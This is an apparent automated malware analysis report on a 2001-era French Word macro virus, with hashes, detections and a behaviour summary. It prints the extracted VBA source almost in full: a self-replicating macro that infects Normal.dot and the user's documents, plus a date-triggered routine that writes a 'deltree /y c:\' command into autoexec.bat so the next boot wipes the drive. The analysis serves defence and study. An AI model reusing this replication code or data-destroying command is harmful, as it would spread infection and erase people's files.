Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9ddf13eb628087e9…

MALICIOUS

Office (OLE)

44.0 KB Created: 2001-07-06 02:53:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c3408cc2ff4a480c19ff6b5873d79764 SHA-1: db0df06cafaa4d802392523080ed4446093f281e SHA-256: 9ddf13eb628087e9dd663ab739ba3ba794f1b9a725e87d2c5482ac2af3ad4f5c
340 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Template Macros T1485 Data Destruction

The VBA project holds a module 'Module3' with an autoOpen subroutine (and an AutoNew companion) that runs when the document is opened or a new one is created. The file 'C:\windows\system\Sony.dll' is used as an infection marker, not as a payload: if it is absent, the macro removes any earlier copy of Module3 from the global template, saves the open document as 'C:\windows\system\AROWANA.Doc', copies Module3 into Normal.dot via Application.OrganizerCopy, creates the marker with Scripting.FileSystemObject, and then walks 'C:\Mes Documents' with Application.FileSearch, injecting Module3 into every *.doc it finds. If the marker already exists, it re-infects the open document from AROWANA.doc and calls dt(), which compares today's date against a hard-coded list of days in January and February 2001, written day-first in the French convention that also shows in the 'Mes Documents' and 'Modèles' paths and the message strings. On a hit, destroye() shows 'Au Revoir' ("Goodbye"), writes c:\Bie.bat containing 'echo deltree /y c:\ > c:\autoexec.bat' (so the next boot wipes the C: drive), warns "Un bon conseil ne redemarrez plus jamais votre PC !" ("A word of advice: never restart your PC again!") under the title "CONSEIL A SUIVRE" ("ADVICE TO FOLLOW"), runs the batch file hidden via Shell(), and quits Word. This is a self-replicating Word macro virus with a date-triggered destructive payload; nothing in the recovered source downloads anything, so it is not a downloader or dropper. ClamAV names the document 'Doc.Trojan.Arowan-1' and the extracted macro source 'Win.Trojan.DelTree-7'.

Heuristics 7

  • ClamAV: Doc.Trojan.Arowan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Arowan-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic is written for cases where no modern VBA project is recovered and no stronger macro-virus family marker is present; here the VBA source was recovered and ClamAV supplies a family name, so this is corroborating evidence of the old Word macro execution surface rather than the primary finding. By itself it is not a downloader or parser-CVE attribution.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6803 bytes
SHA-256: e9787e216d54743e82f3e437efb4601526dd7408a08ba7224633c722e02b95fa
Detection
ClamAV: Win.Trojan.DelTree-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module3"
Sub autoOpen()

Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists("C:\windows\system\Sony.dll") = False Then

On Error Resume Next

With ActiveDocument.AttachedTemplate
            Application.OrganizerDelete _
                Source:="C:\Windows\Application Data\Microsoft\Modèles\Normal.dot", _
                Name:="Module3", _
                Object:=wdOrganizerObjectProjectItems
End With

On Error Resume Next

ActiveDocument.SaveAs ("c:\windows\system\AROWANA.Doc")

Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:="c:\windows\Application data\microsoft\modèles\normal.dot", _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems


Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\Windows\System\Sony.dll", True)
a.Close

Call test

On Error Resume Next

Else

Application.DisplayAlerts = wdAlertsMessageBox

On Error Resume Next

Application.OrganizerCopy Source:="C:\Windows\system\AROWANA.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module3", _
Object:=wdOrganizerObjectProjectItems
Call dt
End If

End Sub
Sub test()
Dim fs As String
With Application.FileSearch
    .NewSearch
    .LookIn = "C:\Mes Documents"
    .SearchSubFolders = True
    .FileName = "*.doc"
    .MatchTextExactly = True
    .FileType = msoFileTypeAllFiles
End With

On Error Resume Next

With Application.FileSearch
    If .Execute() > 0 Then
        For i = 1 To .FoundFiles.Count
            Application.OrganizerCopy Source:="c:\windows\system\AROWANA.doc", _
            Destination:=.FoundFiles(i), _
            Name:="Module3", _
            Object:=wdOrganizerObjectProjectItems
         Next i
    Else
         End If
End With



End Sub
Sub AutoNew()

Application.OrganizerCopy Source:="C:\Windows\system\AROWANA.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module1", _
Object:=wdOrganizerObjectProjectItems

ActiveDocument.Save

End Sub
Sub destroye()
MsgBox "Au Revoir", vbOKOnly + vbExclamation
Set fst = CreateObject("Scripting.FileSystemObject")
Set a = fst.CreateTextFile("c:\Bie.bat", True)
a.writeline ("echo deltree /y c:\ > c:\autoexec.bat")
a.Close
MsgBox "Un bon conseil ne redemarrez plus jamais votre PC !", vbCritical + vbApplicationModal + vbOKOnly, "CONSEIL A SUIVRE"
Shell ("c:\bie.bat"), vbHide
Application.Quit
End Sub

Sub dt()
Dim dater As Date
dater = DateTime.Date

If dater = "9/01/01" Then
Call destroye
End If

If dater = "20/01/01" Then
Call destroye
End If

If dater = "21/01/01" Then
Call destroye
End If

If dater = "22/01/01" Then
Call destroye
End If

If dater = "23/01/01" Then
Call destroye
End If

If dater = "24/01/01" Then
Call destroye
End If

If dater = "25/01/01" Then
Call destroye
End If

If dater = "26/01/01" Then
Call destroye
End If

If dater = "29/01/01" Then
Call destroye
End If

If dater = "2/02/01" Then
Call destroye
End If

If dater = "3/02/01" Then
Call destroye
End If

If dater = "5/02/01" Then
Call destroye
End If

If dater = "6/02/01" Then
Call destroye
End If

If dater = "7/02/01" Then
Call destroye
End If

If dater = "8/02/01" Then
Call destroye
End If

If dater = "9/02/01" Then
Call destroye
End If

If dater = "10/02/01" Then
Call destroye
End If

If dater = "12/02/01" Then
Call destroye
End If

If dater = "14/02/01" Then
Call destroye
End If

If dater = "16/02/01" Then
Call destroye
End If

If dater = "18/02/01" Then
Call destroye
End If

If dater = "20/02/01" Then
Call destroye
End If

If dater = "22/02/01" Then
Call destroye
End If

If dater = "24/02/01" Then
Call destroye
End If

If dater = "26/02/01" Then
Call destroye
End If

If dater = "2
... (truncated)